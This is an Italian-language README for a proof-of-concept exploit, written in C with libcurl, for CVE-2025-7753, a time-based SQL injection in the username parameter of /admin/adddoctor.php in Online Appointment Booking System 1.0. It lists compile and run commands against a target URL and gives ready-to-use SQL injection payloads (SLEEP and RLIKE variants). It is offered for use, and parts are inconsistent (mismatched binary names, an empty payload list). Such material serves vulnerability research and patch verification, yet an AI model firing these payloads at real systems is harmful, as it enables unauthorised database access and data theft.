
PoC Exploit per CVE-2025-7753 — SQL Injection basata sul tempo in Online Appointment Booking System 1.0 tramite il parametro username. Exploit scritto in C usando libcurl.
Autore: Byte Reaper
Telegram: @ByteReaper0
CVE: CVE‑2025‑7753
Vulnerabilità: SQL Injection non autenticata, basata sul tempo
Una vulnerabilità critica di SQL Injection esiste in Online Appointment Booking System 1.0 (Code‑Projects) nel file
/admin/adddoctor.php. Il parametro username non è adeguatamente sanificato, consentendo a utenti malintenzionati remoti di eseguire query SQL arbitrarie (basate sul tempo, sugli errori, UNION, booleane).
Questo repository fornisce il primo PoC pubblico scritto in C, utilizzando libcurl per le richieste HTTP e output con colori ANSI per chiarezza.
Sistema Operativo: Linux (x86_64 raccomandato)
Compilatore: GCC o Clang
Dipendenze:
sudo apt update sudo apt install build-essential libcurl4-openssl-dev
🚀 Compilazione ed Esecuzione
Compila:
gcc exploit.c argparse.c -o CODE_PROJECT -lcurl
Esegui (come root):
sudo ./CODE_PROJECT-7753 -u http://TARGET/Online-Appointment-Booking-System-master/
Modalità verbose (opzionale):
sudo ./CODE_PROJECT -u http://TARGET/... -v
📜 Flusso di Lavoro dell'Exploit
I controlli dell'ambiente verificano che tu sia su Linux e stia eseguendo come root (auto‑elevazione tramite sudo se necessario).
L'array di payload include:
libcurl esegue richieste POST e cattura le risposte del server.
Il parsing della risposta cerca stringhe di errore SQL per confermare la vulnerabilità.
🧪 Payload Testati
11' AND (SELECT 9158 FROM (SELECT(SLEEP(5)))QYZI)-- LGFz 11' RLIKE (SELECT (CASE WHEN (1872=1872) THEN 11 ELSE 0x28 END))-- AfYm … ecc.
MIT